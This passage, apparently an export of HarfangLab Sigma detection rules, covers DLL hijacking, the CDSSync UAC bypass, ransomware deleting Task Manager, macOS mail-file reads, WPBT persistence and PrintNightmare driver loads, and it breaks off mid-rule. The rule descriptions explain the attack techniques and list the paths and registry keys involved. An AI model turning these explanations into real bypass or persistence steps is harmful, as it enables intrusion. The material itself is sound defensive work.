"rule_description": "Detects potential Windows DLL Hijacking via CMSTP.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f57033a5-742d-4552-a746-f6d5dfc7bbae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073882Z",
"creation_date": "2026-03-23T11:45:34.073886Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073893Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/AzAgarampur/byeintegrity5-uac",
"https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies"
],
"name": "t1548_002_prepare_uac_bypass_cdssync.yml",
"content": "title: CDSSync UAC Bypass Prepared\nid: f57033a5-742d-4552-a746-f6d5dfc7bbae\ndescription: |\n Detects the preparation of the CDSSync scheduled task UAC bypass.\n Attackers can manipulate the Windows environment variables registry key to redirect the normal execution flow of the CDSSync scheduled task to load a malicious DLL.\n When the CDSSync scheduled task is run, taskhostw.exe will try to load npmproxy.dll from the %windir%\\\\System32 folder.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the DLL file creation as well as to investigate the DLL file itself to determine its legitimacy.\nreferences:\n - https://github.com/AzAgarampur/byeintegrity5-uac\n - https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies\ndate: 2020/11/27\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.execution\n - attack.t1053\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\system32\\npmproxy.dll'\n - '\\syswow64\\npmproxy.dll'\n\n filter_standard_locations:\n # Don't consider creation of 'npmproxy.dll' at standard locations as malicious.\n # If it ends up being malicious, we will catch it at execution.\n Path:\n - '?:\\windows\\system32\\npmproxy.dll'\n - '?:\\windows\\syswow64\\npmproxy.dll'\n # Other odd locations seen:\n # D:\\PC XXXXX 2021-01-29\\Windows\\SysWow64\\npmproxy.dll\n # 
I:\\OLD_Drive_C\\Windows\\SysWow64\\npmproxy.dll / system32\\npmproxy.dll\n # c:\\tmptsang\\toto\\instal\\windows\\syswow64\\... (ecrit par un 7zG via extraction...)\n - '*\\windows\\system32\\npmproxy.dll'\n - '*\\windows\\syswow64\\npmproxy.dll'\n\n exclusion_dllhost:\n Image|endswith:\n - '\\windows\\system32\\dllhost.exe'\n - '\\windows\\syswow64\\dllhost.exe'\n\n exclusion_docker:\n ProcessImage: '?:\\Program Files\\Docker\\Docker\\resources\\dockerd.exe'\n ProcessSignature: 'Docker Inc'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f57033a5-742d-4552-a746-f6d5dfc7bbae",
"rule_name": "CDSSync UAC Bypass Prepared",
"rule_description": "Detects the preparation of the CDSSync scheduled task UAC bypass.\nAttackers can manipulate the Windows environment variables registry key to redirect the normal execution flow of the CDSSync scheduled task to load a malicious DLL.\nWhen the CDSSync scheduled task is run, taskhostw.exe will try to load npmproxy.dll from the %windir%\\\\System32 folder.\nAttackers may bypass UAC mechanisms to elevate process privileges on the system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the DLL file creation, and to investigate the DLL file itself to determine its legitimacy.\n",
"rule_creation_date": "2020-11-27",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f589e603-b094-4be7-a1be-4500e4d6e42a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085624Z",
"creation_date": "2026-03-23T11:45:34.085626Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085630Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/blackbyte-ransomware/",
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_taskmgr_deletion.yml",
"content": "title: Task Manager Binary Deleted\nid: f589e603-b094-4be7-a1be-4500e4d6e42a\ndescription: |\n Detects the suspicious removal of the task manager binary (taskmgr.exe).\n Before encrypting a system, ransomwares may remove tools that could enable users to kill the running ransomware.\n This behavior is, as of March 2024, used by main payload of the Blackbyte ransomware group.\n It is recommended to analyze the process that deleted taskmgr.exe and look for ransomware-related activities.\nreferences:\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://attack.mitre.org/techniques/T1490/\ndate: 2024/03/14\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1490\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: filesystem_remove\n product: windows\ndetection:\n selection:\n Path:\n - '?:\\Windows\\System32\\Taskmgr.exe'\n - '?:\\Windows\\SysWoW64\\Taskmgr.exe'\n ProcessParentImage|contains: '?'\n\n exclusion_update:\n Image: '?:\\Windows\\System32\\poqexec.exe'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\\\*\\TiWorker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f589e603-b094-4be7-a1be-4500e4d6e42a",
"rule_name": "Task Manager Binary Deleted",
"rule_description": "Detects the suspicious removal of the task manager binary (taskmgr.exe).\nBefore encrypting a system, ransomware may remove tools that could enable users to kill the running ransomware.\nThis behavior is, as of March 2024, used by the main payload of the Blackbyte ransomware group.\nIt is recommended to analyze the process that deleted taskmgr.exe and look for ransomware-related activities.\n",
"rule_creation_date": "2024-03-14",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f59595f0-0de1-496d-b2d1-effe504cb815",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618469Z",
"creation_date": "2026-03-23T11:45:34.618471Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618475Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/",
"https://attack.mitre.org/techniques/T1114/001/"
],
"name": "t1114_001_read_mail.yml",
"content": "title: Suspicious Read Access to Mail Files\nid: f59595f0-0de1-496d-b2d1-effe504cb815\ndescription: |\n Detects a process reading sensitive files related to the Mail application.\n Adversaries may target the user's mail on local systems to collect sensitive information.\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\n - https://attack.mitre.org/techniques/T1114/001/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.t1114.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n # /Users//Library/Mail/V10/MailData/Envelope Index\n Path|startswith: '/Users/*/Library/Mail/*/MailData/Envelope Index'\n ProcessImage|contains: '?'\n\n filter_mail:\n Image:\n - '/System/Library/PrivateFrameworks/EmailDaemon.framework/Versions/A/maild'\n - '/System/Applications/Mail.app/*'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: 
'/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: 
'/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup software ###\n exclusion_backup:\n Image:\n - '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n - '/Library/Oxibox/oxibackupd'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_mailbutler:\n Image: '/Users/*/Library/Application Support/com.mailbutler.agent/Mailbutler.app/Contents/MacOS/Mailbutler Agent'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_norton:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.norton.mes.endpointsecurity'\n\n exclusion_kaspersky:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.kaspersky.kav.kavd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.macpaw.CleanMyMac*'\n - 'com.macpaw.cmm-business'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f59595f0-0de1-496d-b2d1-effe504cb815",
"rule_name": "Suspicious Read Access to Mail Files",
"rule_description": "Detects a process reading sensitive files related to the Mail application.\nAdversaries may target the user's mail on local systems to collect sensitive information.\nIt is recommended to check whether the process that accessed the file had legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1114.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f59b1f82-7a09-4afd-a2f8-492bf5e994d7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076251Z",
"creation_date": "2026-03-23T11:45:34.076253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076257Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/wpbbin.html",
"https://attack.mitre.org/techniques/T1542/001/"
],
"name": "t1542_001_registry_change_allowing_uefi_persistance.yml",
"content": "title: Registry Configuration Allowing UEFI Persistence Changed\nid: f59b1f82-7a09-4afd-a2f8-492bf5e994d7\ndescription: |\n Detects a dangerous modification or a deletion of the DisableWpbtExecution key in the registry.\n When DisableWpbtExecution is 0 or deleted, it allows the execution of wpbbin.exe, a file placed by the BIOS in System32 and executed by smss.exe during OS startup.\n Attackers can use this feature as a persistence mechanism by putting a malicious wpbbin.exe that will be executed at the next startup.\n It is recommended to investigate the execution context of the detected process, other surrounding detections, as well as the file telemetry looking for a written file at \"C:\\Windows\\system32\\wpbbin.exe\" to determine if this action was legitimate.\nreferences:\n - https://persistence-info.github.io/Data/wpbbin.html\n - https://attack.mitre.org/techniques/T1542/001/\ndate: 2022/07/20\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1542.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_target:\n TargetObject|contains: 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\DisableWpbtExecution'\n\n selection_value_set:\n EventType: 'SetValue'\n Details: 'DWORD (0x00000000)'\n\n selection_value_delete:\n EventType: 'DeleteValue'\n\n condition: selection_target and 1 of selection_value_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f59b1f82-7a09-4afd-a2f8-492bf5e994d7",
"rule_name": "Registry Configuration Allowing UEFI Persistence Changed",
"rule_description": "Detects a dangerous modification or a deletion of the DisableWpbtExecution key in the registry.\nWhen DisableWpbtExecution is 0 or deleted, it allows the execution of wpbbin.exe, a file placed by the BIOS in System32 and executed by smss.exe during OS startup.\nAttackers can use this feature as a persistence mechanism by putting a malicious wpbbin.exe that will be executed at the next startup.\nIt is recommended to investigate the execution context of the detected process, other surrounding detections, as well as the file telemetry looking for a written file at \"C:\\Windows\\system32\\wpbbin.exe\" to determine if this action was legitimate.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1542.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5a0d71f-1a1b-430d-bdc6-2c661c63b6f9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607039Z",
"creation_date": "2026-03-23T11:45:34.607043Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607051Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
"https://attack.mitre.org/techniques/T1574/"
],
"name": "t1574_spoolsv_unsigned_provider_load.yml",
"content": "title: Spoolsv Unsigned Print Provider Added\nid: f5a0d71f-1a1b-430d-bdc6-2c661c63b6f9\ndescription: |\n Detects spoolsv loading an unsigned print provider, potentially indicating CVE-2021-1675 exploitation.\n Spoolsv is the print spooler service, and loading unsigned print providers can be used by attackers to exploit vulnerabilities.\n It is recommended to restart the print spooler service, review print provider installations, and check for any signs of unauthorized code execution or file modifications associated with this activity.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://attack.mitre.org/techniques/T1574/\ndate: 2021/07/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1574\n - cve.2021-1675\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\spoolsv.exe'\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\\\?\\\\*'\n\n exclusion_signed:\n Signed: 'true'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\cnp6040c_D8F87.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Cnp60fr-FR_D69BE.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CnAdEPUIFR.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Cnp60MUI_D69BE.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CNXPTN32.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CPC1FR.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CNXDIAS2.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CPC10E.DLL\n exclusion_canon_drivers:\n # Canon drivers are always at the root of the directory.\n ImageLoaded:\n # Standard drivers start with the \"cn\" prefix.\n - 
'?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cn*.DLL'\n # Canon PageComposer drivers always start with the \"cpc\" prefix.\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cpc*.DLL'\n # Canon Driver Information Assist Service always start with the \"cnxdias\" prefix.\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cnxdias*.DLL'\n # Canon Message Resource driver (original version from 2002)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\CNXP*.DLL' # (CNXP0LOG.DLL)\n # Canon NetSpot Suite\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\AUSSDRV.DLL'\n Company: 'CANON INC.'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\UCS32P.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CNKYNS32.DLL\n # Very specific Canon tooling from 1997~2005 (probably not directly done by Canon)\n exclusion_canon_colorgear:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UCS32P.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\CN*.DLL' # (CNKYNS32.DLL, CNKYNS32.DLL, CNWFCGCO.DLL)\n Company: 'Canon'\n Product:\n - 'ColorGear'\n - 'ColorGear C'\n - 'ColorGear dll (x64)'\n - '* DM plug-in DLL' # (RGBPrinter DM plug-in DLL, RGBVirtual DM plug-in DLL)\n - '* GMA plug-in DLL' # (MonitorMatch GMA plug-in DLL, Saturation GMA plug-in DLL, Colorimetric GMA plug-in DLL)\n exclusion_canon_without_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\CNXP*.DLL' # (CNXPHS32.DLL)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Xerox\\Language Data\\V5.0\\en-us\\x3txt4S.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Xerox\\Language Data\\V5.0\\fr\\x3txt4S.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Xerox\\Language Data\\V5.0\\fr\\x3txt7E.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnzim.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnkdm.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnziv.dll\n # 
C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnz.xrs\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnzir.xrs\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\x5lrs.dll\n exclusion_xerox:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Xerox\\Language Data\\V?.?\\\\??-??\\x?txt???.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Xerox\\Language Data\\V?.?\\\\??-??\\x?txt??.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Xerox\\Language Data\\V?.?\\\\??\\x?txt???.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Xerox\\Language Data\\V?.?\\\\??\\x?txt??.dll' # (x3txt01X.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnzim.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnziv.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnkdm.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnz.xrs'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnzir.xrs'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxt*.dll' # (fxthm3axpui.dll, fxt6p4axpUI.DLL, fxt6n1axpUI.DLL,fxt6n1aIPS.DLL, fxt6p4aIPS.DLL, fxthm3aips.dll, fxt6p4aRC.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x5lrs.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x5lrsl.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrpscfhu.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrhwsz.xrs'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrh*.dll' # (xrhwsjdm.dll, xrhwsziu.dll, xrhk2axp.dll, xrhr3aIPS.DLL, xrhr3axpUI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrhws???.xrs' # (xrhwszir.xr)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrzd????.dll' # (xrzdhb32.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrhz????.dll' # (xrhzdczd.dll, xrhzdcis.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x2*.dll' # (x2ptpcSJ.dll, x2coreSJ.dll, x2guiSJ.dll, x2upSJ.dll, x2rnutSJ.dll, x2ptpcRB.dll, x2guiRB.dll, x2utilQ5.dl, x2upQ5.dll, x2comsQ5.dll, 
... )\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x3*.dll' # (x3wfuv8K.dll, x3core8K.dll, x3util8K.dll, x3coms8K.dll, x3up8K.dll, x3fput3C.dll, x3encr3C.dll, x3ptpc3C.dll, x3util3C.dll, x3gui3C.dll, x3core7E.dll, x3rnut7E.dll, x3rnut3X.dll, x3coms00N.dll, x3util00N.dll, x3up00N.dll, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FULGM13A_*.DLL' # (FULGM13A_en-GB.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FX6??ALU-?.DLL' # (FX6BEALU-1.dll, FX6MBALU-1.DLL, FX6SOALU-4.DLL, FX6MHALU-2.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXP??ALU-?.DLL' # (FXP2SALU-4.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrx?????.dll' # (xrxmpzim.dll, xrxmokdm.dll, xrxmnzim.dll, xrxkrziu.dll, xrxmozis.dll, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrx?????.xrs' # (xrxmozir.xrs, xrxkrzir.xrs, ... )\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrxkrz.xrs'\n - 